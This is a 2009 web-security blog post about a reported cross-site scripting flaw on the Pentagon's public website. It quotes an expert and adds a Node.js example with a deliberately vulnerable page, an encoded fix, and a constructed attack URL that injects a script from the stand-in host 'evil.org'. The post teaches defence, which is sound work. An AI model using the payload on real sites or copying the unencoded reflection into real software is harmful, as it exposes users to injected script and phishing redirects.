Hacker exposes XSS flaw on Pentagon website
Sun, 12/13/2009 - 10:40am • Tom C.
In a recent Darkreading.com article (http://tinyurl.com/yls9s92), a hacker going by the name Ne0h exposed a flaw in the Pentagon's public website. Ne0h demonstrated the attack in a post on his blog: http://tinyurl.com/ye5847b.
Why this matters is a simple reminder: even sites backed by multibillion-dollar budgets have vulnerabilities. In the Pentagon's case the XSS was largely a demonstration, but it is still significant: a flaw was found and published, and that will certainly draw more people to probe the site.
According to the article, "Daniel Kennedy, partner with Praetorian Security Group, says the session ID appears to be a tracking cookie, and JavaScript can be injected into the page itself to redirect a user to another site, for instance. 'Since I can pass that page a reference to an external JavaScript, I can do most anything I can do in JavaScript,' says Kennedy, who blogged about the find yesterday. 'That includes basic stuff, like crafting a URL to send to users that appears to be from the Pentagon, but actually redirects to "evil.org,"' for example, he says." (source: http://tinyurl.com/yls9s92)
This quick blog post is simply a reminder: validate your inputs, ENCODE every untrusted value for the HTML context it is rendered in (that is what actually stops a reflected parameter from becoming script), and use a third-party tool to scan your code.
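To make the pattern from the article concrete, here is an added example (not code from the original post, and not the Pentagon's own code) in Node.js: a page that reflects a tracking parameter straight into its markup, the same page with the value HTML-encoded, and the crude check a scanner would make. The page URL, the parameter name `sid`, the `evil.org` script reference and the template are all assumptions for illustration.

```javascript
// Added example: reflected XSS via an unencoded query parameter, beside the
// hardened form. Page, parameter name and payload are assumed, not taken from
// the article or the site it describes.

// Encode the characters that can break out of an HTML text or attribute context.
function htmlEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;'
  })[c]);
}

// Parse the query string of a URL into a plain object (percent-decoded).
function queryParams(url) {
  return Object.fromEntries(new URL(url).searchParams);
}

// Vulnerable: the "sid" tracking parameter (assumed name) is reflected into
// the page exactly as the user supplied it.
function renderVulnerable(url) {
  const sid = queryParams(url).sid ?? '';
  return `<html><body><p>Session: ${sid}</p></body></html>`;
}

// Hardened: the same page, but the untrusted value is encoded for the HTML
// context it lands in, so a <script> tag in the input stays text.
function renderHardened(url) {
  const sid = queryParams(url).sid ?? '';
  return `<html><body><p>Session: ${htmlEncode(sid)}</p></body></html>`;
}

// The check a scanner makes: the template contains no <script> element, so
// any one found in the response was injected through the input.
function hasInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed attack URL of the kind the article describes: the parameter
// carries a reference to an external script. Host and path are placeholders.
const attackUrl = 'https://www.example.gov/index.html?sid=' +
  encodeURIComponent('<script src="http://evil.org/x.js"></script>');

console.log('vulnerable:', renderVulnerable(attackUrl));
console.log('hardened:  ', renderHardened(attackUrl));
```

Run it with `node` and compare the two lines: the vulnerable render hands the browser a live `<script src="http://evil.org/x.js">`, while the hardened render shows the same characters as inert `&lt;script ...&gt;` text. Note that the fix is applied where the value is written into the page, not where it is read; a value that is safe in an HTML text node is not automatically safe inside a `<script>` block or a URL attribute, each of which needs its own encoder.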
Until next time - Be Safe!
Tom Canavan is the author of the book Joomla! Websecurity, a frequent speaker and writer on the topic of web security, and manages http://www.JoomlaRescue.com and www.PotentiaHosting.com.